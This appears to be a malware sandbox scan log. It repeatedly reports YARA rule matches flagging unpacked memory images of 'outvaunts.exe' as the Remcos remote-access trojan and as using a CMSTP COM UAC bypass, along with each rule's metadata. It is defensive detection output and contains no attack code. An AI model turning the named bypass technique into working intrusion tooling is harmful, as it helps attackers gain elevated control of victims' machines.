              Source: 22.2.outvaunts.exe.800000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 22.2.outvaunts.exe.800000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 22.2.outvaunts.exe.800000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 39.2.outvaunts.exe.fd0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 39.2.outvaunts.exe.fd0000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 39.2.outvaunts.exe.fd0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 26.2.outvaunts.exe.1130000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 26.2.outvaunts.exe.1130000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 26.2.outvaunts.exe.1130000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 39.2.outvaunts.exe.fd0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 39.2.outvaunts.exe.fd0000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 39.2.outvaunts.exe.fd0000.0.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 27.2.outvaunts.exe.2930000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 27.2.outvaunts.exe.2930000.1.raw.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 27.2.outvaunts.exe.2930000.1.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 38.2.outvaunts.exe.1120000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 38.2.outvaunts.exe.1120000.0.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 38.2.outvaunts.exe.1120000.0.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 6.2.outvaunts.exe.690000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 6.2.outvaunts.exe.690000.0.raw.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 6.2.outvaunts.exe.690000.0.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 23.2.outvaunts.exe.fb0000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 23.2.outvaunts.exe.fb0000.0.raw.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 23.2.outvaunts.exe.fb0000.0.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 32.2.outvaunts.exe.1160000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 32.2.outvaunts.exe.1160000.0.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 32.2.outvaunts.exe.1160000.0.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 38.2.outvaunts.exe.1120000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 38.2.outvaunts.exe.1120000.0.raw.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 38.2.outvaunts.exe.1120000.0.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 12.2.outvaunts.exe.10d0000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 12.2.outvaunts.exe.10d0000.0.raw.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 12.2.outvaunts.exe.10d0000.0.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 16.2.outvaunts.exe.11a0000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 16.2.outvaunts.exe.11a0000.0.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 16.2.outvaunts.exe.11a0000.0.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 14.2.outvaunts.exe.770000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 14.2.outvaunts.exe.770000.0.raw.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 14.2.outvaunts.exe.770000.0.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 14.2.outvaunts.exe.770000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 14.2.outvaunts.exe.770000.0.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 14.2.outvaunts.exe.770000.0.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 35.2.outvaunts.exe.10f0000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 35.2.outvaunts.exe.10f0000.0.raw.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 35.2.outvaunts.exe.10f0000.0.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 30.2.outvaunts.exe.1190000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 30.2.outvaunts.exe.1190000.0.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 30.2.outvaunts.exe.1190000.0.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 18.2.outvaunts.exe.1230000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 18.2.outvaunts.exe.1230000.0.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 18.2.outvaunts.exe.1230000.0.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 36.2.outvaunts.exe.670000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 36.2.outvaunts.exe.670000.0.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 36.2.outvaunts.exe.670000.0.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 13.2.outvaunts.exe.1140000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 13.2.outvaunts.exe.1140000.0.raw.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 13.2.outvaunts.exe.1140000.0.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 7.2.outvaunts.exe.1080000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 7.2.outvaunts.exe.1080000.0.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 7.2.outvaunts.exe.1080000.0.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 19.2.outvaunts.exe.1100000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 19.2.outvaunts.exe.1100000.0.raw.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 19.2.outvaunts.exe.1100000.0.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 28.2.outvaunts.exe.1110000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 28.2.outvaunts.exe.1110000.0.raw.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 28.2.outvaunts.exe.1110000.0.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 10.2.outvaunts.exe.6f0000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 10.2.outvaunts.exe.6f0000.0.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 10.2.outvaunts.exe.6f0000.0.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
